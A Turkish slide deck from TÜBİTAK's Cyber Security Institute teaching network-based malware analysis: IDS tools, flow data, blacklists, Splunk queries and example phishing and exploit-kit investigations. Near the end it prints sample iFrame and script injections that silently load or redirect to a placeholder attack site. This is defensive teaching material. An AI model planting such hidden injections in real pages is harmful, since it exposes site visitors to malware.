TÜBİTAK BİLGEMSiber Güvenlik Enstitüsü

13 Ocak 2016

Ağ Üzerinde Zararlı Yazılım Analizi

Ağ Üzerinde Zararlı Yazılım Analizi

2

Tanım

• Bilgisayar ağlarının herhangi saldırı ve zararlı faaliyete karşın izlenmesi ve analiz edilmesi

Amaç

• Şüpheli bağlantı ve zararlı yazılım tespiti

• Saldırı kaynaklarını araştırma

Yöntem

• Kurum içine ve dışarı yapılan ağ bağlantıların sistematik olarak incelenmesi

Kaynaklar

• Kaydedilmiş Ağ Trafiği (PCAP)

• Saldırı Tespit Sistemi Kayıtları

• İçerik Filtreleyici Kayıtları

• Güvenlik Duvarı Kayıtları

• Ağ Akış Bilgisi Kayıtları

Ağ Analizi | Metodoloji

3

Bilgi Edinme

•Olay ne zaman ve nasıl gerçekleşti?

•Ortam ve organizasyon hakkında bilinmesi gerekenler

Strateji

•Önceliklendirme

Delil Toplama

•Not Tutma

•Delil Muhafaza Etme

Analiz

•İlişkilendirme

•Zaman Tüneli

•Ek delil toplama

Raporlama

•Dökümantasyon

Ağ Analizi | Delil Toplama

4

Kanıt Elde etme Saklama Sağlayacağı bilgiler

Analiz etmek için

kullanılacak

araçlar

Tipik kullanım

PCAP

Ağ üzerindeki

makinalar, tap cihazları

ve ağ üzerindeki bitleri

okuyabilecek her hangi

bir alet

Çok fazla saklama alanı

işgal eder. Saklama

cihazları için ek maliyet

harcamanız gerekebilir.

Ağ üzerinden geçen

verinin tamamına

erişebilirsiniz.

Wireshark, güvenlik

duvarı, içerik analiz

araçları vb.

Derinlemesine

incelemelerde, saldırganın

gerçekleştirdiği atakların

tespitinde kullanılır.

Ağ akışı

Uygulamalar ve flow

çıkaran araçlar

(anahtarlama ve

yönledirici cihazlar)

Az miktarda saklama

gereksinimi duyar.

Büyük ağ paketlerini

özetler.

Bağlantılar, gönderilen

veri miktarı, zaman, vb

hakkında özet bilgiler

sunar.

Silk, Argus, vb.

Saldırganın ve ele geçirilen

sistemlerin tespitinde

kullanılır.

Olay

kayıtları

/Uyarılar

Olay kayıtı üretebilecek

her uygulamadan ya da

bu uygulamaların

gönderdiği olay kayıt

sistemleri

Genellikle olay kayıt

yapan cihazlar üzerinde

bulunabilir. Bununla

birlikle merkezi olay

kayıt yönetim

sistemlerince saklanır.

Belirlenen kriter

haricindeki bir güvenlik

olayı hakkında bilgi

sunar.

Splunk, Arcsight,

SIEM’s

Yüksek öncelikli olaylar

hakkında uyarılarda

bulunur ve saldırganın, ele

geçirilen sistemlerin

tespitinde kullanılır.

Ağ Analizi - Zorluklar - 4V

5

Volume

• Büyük Ağ Verisi (GB’s)

Velocity

• Yüksek Veri Akışı

Variety

• Farklı Protokoller

Variability

• Geçici, uçucu bilgiler

Ağ Analizi Genel Yaklaşımı

6

Olay ne zaman, nasıl ve nerede

gerçekleşti?

Zaman Tüneli

ÖnceliklendirmeOlayın kaynağı

kim?

İlişkilendirme

Analiz Aşamaları

7

1

Trafik kaydetme vefiltreleme

• Trafiği STS’den geçirme

• Trafik filtreleme

• Metadata, Flow, PCAP analizi

2

Tehdit istihbaratı – IP / alan adı kara listeleri

• Bağlantıların IP kara listeleriyle karşılaştırılması

• Tehdit istihbaratı (IOC)servis kontrolü

3 4

Antivirüs taraması

• Trafikten şüpheli uzantılı (.exe, .js, .zip, .rar vb.) dosyalarınçıkarılması

• Antivirüs sisteminde dosya taratılması

İstatistiksel korelasyon ve tablolar

• İstatistikler, tablolar ve korelasyon analizleri

• Snorby• Nfsen• Splunk

Bilgisayar Analizi Paylaşımı• Ağ trafiğinden elde edilen

bulguların bilgisayar analizi için paylaşılması

5

Saldırı Tespit/Engelleme Sistemleri

8

• Yüksek performanslı çalışabilme

• Gigabitler seviyesinde ağ trafiğini işleyebilmesi

• HTTP isteklerini, TLS el sıkışmalarını, SSH bağlantılarını kaydedebilme

• Trafikten dosya ayıklama

• Endüstri standartlarınca belirlenen formatlarda çıktı üretebilme (Unified2 vb.),

• Gelişmiş kural setine sahip olması (ET-ET Pro)

• IP itibar (reputation) desteğinin olması

Suricata IDS

• Bileşim sistemlerine sızma denemeleri

• Ağdaki sistemlere zarar verecek her tür saldırılar

• DDOS

• Yetkisiz erişim

• Yazılım ya da donanımsal çözümler olarak sunulmaktadır.

• İmza tabanlı çalışır.

• Kural setleri mevcuttur.

STS özellikleri

Saldırı Tespit/Engelleme Sistemleri

9

Bro açık kaynak;

• Ağ programlama betik diline sahip,

• Tüm HTTP trafiğini (sunucu/istemci istek ve cevapları, mime türleri, uri vb.), DNS istek ve cevaplarını, SSL sertifikalarını, SMTP oturumlarını, FTP trafiğini çözümleyerek kaydedebilmektedir. Ayrıca ağ akışını da kayıt altına almaktadır.

Bro IDS - Ağ Analiz Framework

• Sourcefire tarafından geliştirilen açık kaynak kodlu bir saldırı tespit ve önleme sistemi• Dünya genelinde en çok kullanılan saldırı tespit sistemlerden biri, Linux ve FreeBSD • Snort Modları

• Sniffer• Packet logger

Snort IDS

IDS Sistemleri Eksiklikleri

10

• Özellikle exploit tabanlı imzaların doğruluk problemleri• Bilinmeyen anomali (0-day) ve sızmalara karşı etkisiz kalması• Adli analiz veya saldırı analizi için kaliteli bilgi sağlamaması

• Saldırı kapsamı / Hedef / Strateji , saldırı ( botnet ) boyutuvb.

• Kasıt olmayan anomalilerle kötü niyetli olayları ayırt edememesi• Sistemsel arıza ve problemler

Ağ Paketi Yakalama/Analizi

11

• Komut satırı paket analiz aracı ve dinleyicisi

• Wireshark ile beraber sisteme kurulmaktadır.

tshark

• Unix/Linux sistem üzerinde ön tanımlı

• Komut satırı paket analiz aracı ve dinleyicisi

Tcpdump

• Arayüze sahip paket analiz aracı

• Standart paket dinleme aracı

• Windows & Linux

Wireshark

• Windows tarafından geliştirilmektedir.

• Process tabanlı ağ trafiği incelemeye olanak sağlar.

Microsoft Message Analyzer

Ağ Analizi | Ağ Akış Bilgisi (Flow Data)

12

• Kaynak sistemden hedefe gönderilen paketlerin veri içeren kısımları işlenmeden özet bilgi sunar.

o Kaynak IP

o Hedef IP

o Kaynak port

o [TCP, UDP veya 0 (TCP ya da UDP trafiği değilse)]

o Hedef port

o IP protokolü

o Ağ akışı boyutu ve paket sayısı

o IP servis tipi

• Ağ Akış Protokolleri

• NetFlow (Cisco)

• sFlow (HP)

• IPFIX (Herhangi bir üretici firmaya özel bir protokol değildir.)

Ağ Akışı (Flow Data)

Ağ Analizi | Ağ Akış Bilgisi (Flow Data)

13

Netflow

• Cisco tarafından geliştirilmiş bir ağ akış protokolü

• Cisco IOS haricinde, Linux, BSD ve Solaris platformlarında da desteklendiği için bir standart halini almıştır.

• Ağ akışı 7 temel değerden oluşur.

sFlow

• HP marka cihazlar tarafından kullanılan ağ akış protokolü

IPFIX

• IP Flow Information Export, herhangi bir üretici firmaya özel bir protokol değildir.

• Netflow v9 ile büyük oranda benzerlik gösterir.

• Aslında Netflow protokolünün farklı türde cihazların kullanılabilmesi için esnetilmiş hali denebilir.

• IPFIX protokolü Juniper, Nortel, SonicWALL, Extreme, NTOP, Plixer gibi ürünler tarafından desteklenmektedir.

Ağ Akışı (Flow) Analizi Araçları

14

• Ağ akışı verileri bir web arayüzü ile görüntülenebilmektedir.

Nfsen

• Kaynak sistemden hedefe gönderilen paketlerin veri içeren kısımları işlenmeden özet bilgi sunar.

• Ağ Akış Protokolleri

• NetFlow (Cisco)

• sFlow (HP)

• IPFIX (Herhangi bir üretici firmaya özel birprotokol değildir.)

Ağ Akışı (Flow Data)

• Flow Basic Analysis Tool

• Ağ akışı görselleştirme, analiz, sorgulama, korelasyon aracı

FLOWBAT

• CERT NetSA (CERT Network Situational Awareness Team) tarafından geliştirilmiş ağ akış bilgisinin toplanmasını ve işlenmesini sağlayan bir yazılımdır.

Silk

Tehdit İstihbaratı – IP / Alan Adı Kara Listeleri

IP Adresi / Alan adı Karalisteleri

• Gerçek zamanlı IP adresi / alan adı

tehdit bilgisi

• Otomatik olarak üretilme -

genelde günlük

• Çeşitli kaynaklar tarafından

oluşturulma - organizasyonlardan

özel şirketlere

• Farklı durumlar için faydalı:

– İP skorlama, sınıflandırma

– Enfekte olmuş sistemlerin tespiti

– Yüksek riskli bağlantılar için uyarı

15

Antivirüs Taraması

16

Dosya Çıkarımı

• Trafikten şüpheli uzantılı (.exe, .js, .zip, .rar vb.) dosyaların çıkarılması

Antivirüs Taraması

• VirüsMü merkezi çoklu antivirus sisteminde tarama

• TÜBİTAK Siber Güvenlik Enstitüsü tarafından geliştirilen sistemde 20 farklı antivirüs aracıyla otomatik olarak taratılmaktadır.

• VirusTotal

Veri Toplama-Analiz-Görselleştirme

17

Farklı kaynaklardan gelen verileri ilişkilendirmek

Olay ile tespiti arasındaki süreyi kısaltmak

Genel eğilimler ve anormaliklerin tespiti

SONUÇ : Büyük veriden anlamlı sonuçlar çıkarmak

Veri Toplama-Analiz-Görselleştirme Araçları | Yaklaşım

18

Veriyi Tanımla

• Ne verisi?

• Hangi bilgileri içeriyor?

Veriyi Dönüştür

• Alan oluşturma

• Filtreleme

• Sorgulama

• Sınıflandırma

Veriyi Görüntüle

• Çizelgeler

• Tablolar

• Grafikler

• İstatikler

• Raporlar

Veri Toplama-Analiz-Görselleştirme Araçları

19

OSSEC HIDS – OSSIM SIEM

ELK (Elastic Search – Logstash - Kibana)

• Büyük verilerinin indekleslenmesi, analiz edilmesi ve görüntülenmesi

• Özellikle güçlü sorgulamaya yeteneğine sahip

Splunk

• Alarmların gelişmiş arayüzden görüntülenmesi

Snorby

• Web arayüzü vasıtasıyla filtreleme ve sorgulama

Moloch

20

source="/home/hasan/Desktop/data/http.log" | iplocation DestinationIP | lookup threatscore clientip as DestinationIP| search threatscore="1"

Sorgular

| timechart span=1h count --- count the number of events pr hour| timechart avg(delay) by host --calculate the average delay and trackeach host seperately| timechart avg(delay) min(delay) max(delay) --- calculate the average, minimum, and maximum delays per auto-bucket| top limit=50 users| top major_version, minor_version ---list the top 10 combiantions of majorand minor versions| top sourceby host --- list the top sources grouped by most fequently host| ctable DestinationIP --bütün threatscore değerlerine göre tablo oluşturur.|source="/usr/local/bro/logs/current/dns.log" | streamstats current=f last(_time) as next_time by Query | eval gap = next_time - _time | statscount avg(gap) var(gap) by Query|sourcetype=dns | eval Length=len(Query) | stats count(clientip) by Length | sort - Length

source="/usr/local/bro/logs/dns_filtered.log" | iplocation QueryIP | streamstats current=f last(_time) as next_time by Query | eval gap = next_time- _time | stats count avg(gap) var(gap) by Query | sort + var(gap)

İstatistiksel ve Görsel Analizler

21

Örnek Analizler

1 - Oltalama Saldırısı Ağ Analizi

23

Zararlı Bağlantı Kurulması

24

Exploit Aşaması

25

Zararlı Yazılımın Yüklenmesi

26

2 - Exploit Kit Yükleme ve Ağ Analizi

27

Sayfa ziyaretedilir.

Flash Player, Java ya da Silverlight

benzeriuygulamalar ileexploit çalışır.

Exploit çalışıncazararlı yazılım

sisteme yüklenir

IDS Alarm Oluşması

28

DHCP ve NBNS protokolü ile istemci tespiti

29

Web tarayıcıdan kurulan bağlantılar

30

HTTP istekleri ile Web tarayıcıdan yapılan istekler incelendiğinde zararlı alanadlarına yapılan bağlantılar görülmektedir.

Exploit Aşaması

31

Exploit Aşaması

32

Trafik Bulanıklaştırma (Obfuscation)

33

3 - iFrame Enjeksiyonları Analizi

34

• iFrame asıl HTML sayfası içerisinde bulunan ve kaynağını, yani içeriğini asıl sayfa dışında başka bir siteden alan çerçevelerdir.

• iFrame <iframe> </iframe> tagları ile belirtilir ve kapatılması zorunludur.

• Bir saldırı sitesine iframe yerleştirme :

<iframe frameborder="0" height="0" src="http://<saldırı-sitesi>/path/file" style="display:none" width="0"></iframe>

iFrame Enjeksiyon Örneği

35

Farklı Enjeksiyonlar

36

• Bir saldırı sitesinden komut dosyası çağıran veya çalıştıran JavaScript veyabaşka bir kodlama dili:

• Tarayıcıyı bir saldırı sitesine yönlendiren komut dosyaları

iFrame kodunu bulmak için [iframe] gibi kelimeleri aramak da yardımcıolabilir.

Örneğin, Unix tabanlı sistemlerde:

<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>

<script>if (document.referrer.match(/google\.com/)) {window.location("http://malware-attack-site/");

}</script>

$ grep -irn "iframe" ./ | less

PNG Dosyası içine iFrame Enjeksiyonu

37

Sonuç - Bulguların Paylaşımı

38

Ağ Analizi

Bilgisayarve Zararlı

YazılımAnalizi

Teşekkürler